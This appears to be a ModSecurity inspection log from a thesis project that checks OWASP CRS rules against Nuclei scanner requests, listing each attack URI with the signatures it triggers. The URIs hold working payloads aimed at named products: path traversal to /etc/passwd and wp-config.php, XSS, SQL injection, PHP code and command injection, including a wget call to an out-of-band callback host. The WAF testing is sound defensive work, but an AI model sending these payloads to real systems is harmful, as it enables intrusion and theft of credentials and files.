# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l vulnerabilities.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/conf_predeterminada/web_estatica/owasp/opensource/nuclei/vulnerabilities.clean
Packet [1]	Uri [/web/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml]	Nattacks [2 ]	Signatures	[930110]	[930110]
Packet [3]	Uri [/web/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]
Packet [4]	Uri [/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [5]	Uri [/web/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7]	Nattacks [4 ]	Signatures	[920220]	[920272]	[942440]	[942431]
Packet [6]	Uri [/web/register/?redirect_to=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [7]	Uri [/web/?piereg_logout_url=true&redirect_to=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [8]	Uri [/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [10]	Uri [/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [12]	Uri [/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [13]	Uri [/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [14]	Uri [/web/../../../../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [16]	Uri [/web/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [18]	Uri [/web/index.php?s=Admin-Data-down&id=../../Conf/config.php]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [19]	Uri [/web/him/api/rest/V1.0/system/log/list?filePath=../]	Nattacks [1 ]	Signatures	[930110]
Packet [22]	Uri [/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1]	Nattacks [1 ]	Signatures	[933150]
Packet [28]	Uri [/web/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml]	Nattacks [2 ]	Signatures	[930110]	[930110]
Packet [30]	Uri [/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini]	Nattacks [2 ]	Signatures	[920440]	[930100]
Packet [31]	Uri [/web/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7]	Nattacks [4 ]	Signatures	[920220]	[920272]	[942440]	[942431]
Packet [33]	Uri [/web/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]
Packet [34]	Uri [/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [35]	Uri [/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [37]	Uri [/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [38]	Uri [/web/../../../../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [39]	Uri [/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [42]	Uri [/web/him/api/rest/V1.0/system/log/list?filePath=../]	Nattacks [1 ]	Signatures	[930110]
Packet [45]	Uri [/web/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [46]	Uri [/web/index.php?s=Admin-Data-down&id=../../Conf/config.php]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [49]	Uri [/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [51]	Uri [/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [52]	Uri [/web/docpicker/internal_proxy/http/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [53]	Uri [/web/wt3/forceSave.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [54]	Uri [/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1]	Nattacks [1 ]	Signatures	[933150]
Packet [58]	Uri [/web/register/?redirect_to=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [60]	Uri [/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini]	Nattacks [2 ]	Signatures	[920440]	[930100]
Packet [61]	Uri [/web/?mdocs-img-preview=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [63]	Uri [/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [64]	Uri [/web/wt3/forceSave.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [65]	Uri [/web/docpicker/internal_proxy/http/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [66]	Uri [/web/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E]	Nattacks [9 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942180]	[942260]	[942431]	[942460]	[942511]
Packet [67]	Uri [/web/wp-content/uploads/affwp-debug.log]	Nattacks [1 ]	Signatures	[920440]
Packet [70]	Uri [/web/plugins/weathermap/configs/poc.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [72]	Uri [/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [74]	Uri [/web/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [76]	Uri [/web/wps/PA_WCM_Authoring_UI/proxy/http/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [77]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [78]	Uri [/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [82]	Uri [/web/./../../../../../../../../../../windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [90]	Uri [/web/download.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [92]	Uri [/web/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//]	Nattacks [2 ]	Signatures	[942431]	[942460]
Packet [93]	Uri [/web/%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [1 ]	Signatures	[941110]
Packet [94]	Uri [/web/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [95]	Uri [/web/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [96]	Uri [/web/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E]	Nattacks [9 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942180]	[942260]	[942431]	[942460]	[942511]
Packet [97]	Uri [/web/wp-content/uploads/affwp-debug.log]	Nattacks [1 ]	Signatures	[920440]
Packet [98]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[931130]	[932160]	[942460]
Packet [101]	Uri [/web/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [103]	Uri [/web/plugins/weathermap/configs/poc.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [104]	Uri [/web/wps/PA_WCM_Authoring_UI/proxy/http/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [107]	Uri [/web/./../../../../../../../../../../windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [112]	Uri [/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [113]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [117]	Uri [/web/download.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [119]	Uri [/web/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//]	Nattacks [2 ]	Signatures	[942431]	[942460]
Packet [120]	Uri [/web/%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [1 ]	Signatures	[941110]
Packet [122]	Uri [/web/?noptin_ns=email_click&to=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [123]	Uri [/web/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)]	Nattacks [2 ]	Signatures	[941170]	[941210]
Packet [124]	Uri [/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [128]	Uri [/web/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [129]	Uri [/web/sap/public/bc/icf/logoff?redirecturl=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [133]	Uri [/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[931130]	[932160]	[942460]
Packet [134]	Uri [/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D]	Nattacks [4 ]	Signatures	[932130]	[933160]	[942431]	[942460]
Packet [135]	Uri [/web/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"]	Nattacks [4 ]	Signatures	[941100]	[941120]	[941160]	[942110]
Packet [138]	Uri [/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acjap9m8v98g1htghgcekcuceyyyyyr.oast.online]	Nattacks [1 ]	Signatures	[931130]
Packet [141]	Uri [/web/?u=http://c8acjap9m8v98g1htghgcekcuceyyyyyg.oast.online/&href=http://c8acjap9m8v98g1htghgcekcuceyyyyye.oast.online/&action=http://c8acjap9m8v98g1htghgcekcuceyyyyyk.oast.online/&host=c8acjap9m8v98g1htghgcekcuceyyyyyc.oast.online&http_host=c8acjap9m8v98g1htghgcekcuceyyyyyq.oast.online&email=root@c8acjap9m8v98g1htghgcekcuceyyyyyo.oast.online&url=http://c8acjap9m8v98g1htghgcekcuceyyyyy1.oast.online/&load=http://c8acjap9m8v98g1htghgcekcuceyyyyyw.oast.online/&preview=http://c8acjap9m8v98g1htghgcekcuceyyyyys.oast.online/&target=http://c8acjap9m8v98g1htghgcekcuceyyyyya.oast.online/&proxy=http://c8acjap9m8v98g1htghgcekcuceyyyyy4.oast.online/&from=http://c8acjap9m8v98g1htghgcekcuceyyyyyh.oast.online/&src=http://c8acjap9m8v98g1htghgcekcuceyyyyy6.oast.online/&ref=http://c8acjap9m8v98g1htghgcekcuceyyyyby.oast.online/&referrer=http://c8acjap9m8v98g1htghgcekcuceyyyybn.oast.online/]	Nattacks [1 ]	Signatures	[931130]
Packet [142]	Uri [/web/guest_auth/poc.php?cmd=cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [144]	Uri [/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [145]	Uri [/web/./../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [146]	Uri [/web/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [147]	Uri [/web/images/..%2fapply_abstract.cgi]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [148]	Uri [/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [149]	Uri [/web/eam/vib?id=/etc/issue]	Nattacks [1 ]	Signatures	[930120]
Packet [150]	Uri [/web/index.php?plot=;wget%20http://c8acjap9m8v98g1htghgcekcuceyyyybe.oast.online]	Nattacks [3 ]	Signatures	[932105]	[932115]	[942110]
Packet [153]	Uri [/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))]	Nattacks [4 ]	Signatures	[942150]	[942300]	[942410]	[942431]
Packet [154]	Uri [/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [155]	Uri [/web/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [157]	Uri [/web/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[931130]	[932160]	[942460]
Packet [159]	Uri [/web/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'']	Nattacks [14 ]	Signatures	[933161]	[942140]	[942190]	[942110]	[942150]	[942200]	[942310]	[942330]	[942370]	[942410]	[942480]	[942430]	[942431]	[942460]
Packet [160]	Uri [/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [162]	Uri [/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [163]	Uri [/web/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)]	Nattacks [2 ]	Signatures	[941170]	[941210]
Packet [167]	Uri [/web/sap/public/bc/icf/logoff?redirecturl=https://example.com]	Nattacks [1 ]	Signatures	[931130]
Packet [170]	Uri [/web/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)]	Nattacks [2 ]	Signatures	[941170]	[941210]
Packet [171]	Uri [/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini]	Nattacks [2 ]	Signatures	[920440]	[930110]
Packet [173]	Uri [/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D]	Nattacks [4 ]	Signatures	[932130]	[933160]	[942431]	[942460]
Packet [177]	Uri [/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c8acjap9m8v98g1htghgcekcuceyyyyyr.oast.online]	Nattacks [1 ]	Signatures	[931130]
Packet [179]	Uri [/web/Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [180]	Uri [/web/images/..%2fapply_abstract.cgi]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [181]	Uri [/web/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [182]	Uri [/web/./../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [184]	Uri [/web/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=]	Nattacks [6 ]	Signatures	[941100]	[941120]	[941160]	[941150]	[941320]	[942431]
Packet [185]	Uri [/web/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[931130]	[932160]	[942460]
Packet [186]	Uri [/web/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [189]	Uri [/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [190]	Uri [/web/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php]	Nattacks [1 ]	Signatures	[930120]
Packet [193]	Uri [/web/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [194]	Uri [/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))]	Nattacks [4 ]	Signatures	[942150]	[942300]	[942410]	[942431]
Packet [198]	Uri [/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [201]	Uri [/web/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [202]	Uri [/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [6 ]	Signatures	[920230]	[920272]	[942270]	[942361]	[942430]	[942431]
Packet [207]	Uri [/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [209]	Uri [/web/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [6 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942431]
Packet [210]	Uri [/web/wp-content/force-download.php?file=../wp-config.php]	Nattacks [2 ]	Signatures	[930110]	[930120]
Packet [213]	Uri [/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnmJujIVh1aSQnDamnPs1WzFH.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B]	Nattacks [6 ]	Signatures	[933100]	[933150]	[933160]	[942430]	[942431]	[942460]
Packet [214]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [216]	Uri [/web/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [217]	Uri [/web/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [9 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942110]	[942130]	[942260]	[942431]	[942460]
Packet [219]	Uri [/web/?aam-media=wp-config.php]	Nattacks [1 ]	Signatures	[930120]
Packet [220]	Uri [/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [221]	Uri [/web/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [225]	Uri [/web/wp-json/oembed/1.0/proxy?url=http://c8acjap9m8v98g1htghgcekcucayyyybq.oast.online/]	Nattacks [1 ]	Signatures	[931130]
Packet [227]	Uri [/web/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b']	Nattacks [14 ]	Signatures	[933161]	[942140]	[942190]	[942110]	[942150]	[942200]	[942310]	[942330]	[942410]	[942480]	[942430]	[942440]	[942431]	[942460]
Packet [234]	Uri [/web/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php]	Nattacks [1 ]	Signatures	[930120]
Packet [239]	Uri [/web/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [6 ]	Signatures	[920230]	[920272]	[942270]	[942361]	[942430]	[942431]
Packet [244]	Uri [/web/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [250]	Uri [/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnmJujIVh1aSQnDamnPs1WzFH.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B]	Nattacks [6 ]	Signatures	[933100]	[933150]	[933160]	[942430]	[942431]	[942460]
Packet [254]	Uri [/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [255]	Uri [/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [256]	Uri [/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [257]	Uri [/web/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [259]	Uri [/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27]	Nattacks [6 ]	Signatures	[932100]	[932110]	[942110]	[942150]	[942410]	[942431]
Packet [261]	Uri [/web/website/lang/en_US?r=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [262]	Uri [/web/wp-content/plugins/.git/config]	Nattacks [1 ]	Signatures	[930130]
Packet [263]	Uri [/web/include/thumb.php?dir=http\\..\\..\\config\\config_db.php]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [266]	Uri [/web/wp-json/oembed/1.0/proxy?url=http://c8acjap9m8v98g1htghgcekcucayyyybq.oast.online/]	Nattacks [1 ]	Signatures	[931130]
Packet [267]	Uri [/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/]	Nattacks [1 ]	Signatures	[931130]
Packet [269]	Uri [/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E]	Nattacks [9 ]	Signatures	[941100]	[941120]	[941160]	[942110]	[942180]	[942260]	[942431]	[942460]	[942511]
Packet [272]	Uri [/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [276]	Uri [/web/wp-content/themes/.git/config]	Nattacks [1 ]	Signatures	[930130]
